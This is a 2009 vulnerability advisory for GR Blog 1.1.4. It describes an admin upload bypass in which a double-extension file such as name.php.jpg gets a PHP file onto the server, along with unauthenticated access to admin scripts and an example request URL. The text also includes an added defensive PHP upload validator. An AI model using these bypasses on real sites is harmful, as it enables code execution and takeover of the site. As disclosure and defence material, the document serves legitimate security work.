
# Title : GR Blog 1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities
# Published : 2009-02-04
# Author : JosS


GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities
 
Author: Jose Luis Gongora Fernandez
        (a.k.a) JosS <sys-project[at]hotmail.com>

Web:    http://hack0wn.com/
 
/*************************/
TESTED ON VERSION GR Blog v1.1.4 (on my localhost)
Download : http://sirini.net/grboard/board.php?id=grblog&articleNo=43
/*************************/
 
[+] Remote File Upload:
 
 /admin/admin_upload.php (simple bypass)
 upload --> name.php.jpg
 
 PATH example: /data/2009/02/04/name.php.jpg
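
A defensive counterpart to the upload issue above, as an added example that is not GR Blog's code or part of the original advisory: a PHP check that refuses names such as name.php.jpg, verifies the content by magic bytes and stores the file under a server-generated name. The function name, the allowlist and the sample inputs are assumptions made for illustration; it needs PHP 7.1+ with the fileinfo extension.

```php
<?php
// Added example, not GR Blog code; every name below is hypothetical.
const ALLOWED_TYPES = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

/**
 * Return a server-generated name for an upload, or null when it is refused.
 * $original is the client-supplied file name, $bytes the uploaded content.
 */
function safe_upload_name(string $original, string $bytes): ?string
{
    $parts = explode('.', strtolower(basename($original)));
    // Require exactly one extension, so "name.php.jpg" is refused outright.
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;
    }
    $ext = $parts[1];
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;
    }
    // The content itself must match the claimed type (magic bytes).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    // Never reuse the client's name on disk: random stem, one known extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs, not real uploads.
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;";
$php = "<?php echo 'x'; ?>";
$cases = [['photo.gif', $gif], ['name.php.jpg', $gif], ['name.php.jpg', $php], ['x.gif', $php]];
foreach ($cases as [$name, $bytes]) {
    printf("%-13s %s\n", $name, safe_upload_name($name, $bytes) ?? 'REJECTED');
}
// In a real handler, $bytes would come from file_get_contents($_FILES[...]['tmp_name'])
// and the file would be stored with move_uploaded_file() under the returned name.
```

Serving the upload directory with script execution disabled is a separate, complementary control.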
 
 
 --------------
 files: /admin
 
[+] SIMPLE bypass:
 
 admin_user.php
 admin_post.php
 admin_all.php
 more files...
 
 !xpl: you can enter any of these files
 
[+] GET bypass:
 
 admin_modify_comment.php
 --
 <?php
 @header('Content-Type: text/html; charset=utf-8');
 if(array_key_exists('uid', $_GET) && $_GET['uid']) $uid = $_GET['uid'];
 else exit();
 --
 !xpl: http://localhost/blog/admin/admin_modify_comment.php?uid=1
 
 more files...
 
[+] POST bypass:
 
 admin_category.php
 --
 <?php
 if(array_key_exists('categoryName', $_POST) && $_POST['categoryName'])
 --
 !xpl: --
 
 admin_insert.php
 --
 <?php
 $e = true;
 if(array_key_exists('postStart', $_POST) && $_POST['postStart'])
 --
 !xpl: --
 
 more files...
 
 __h0__
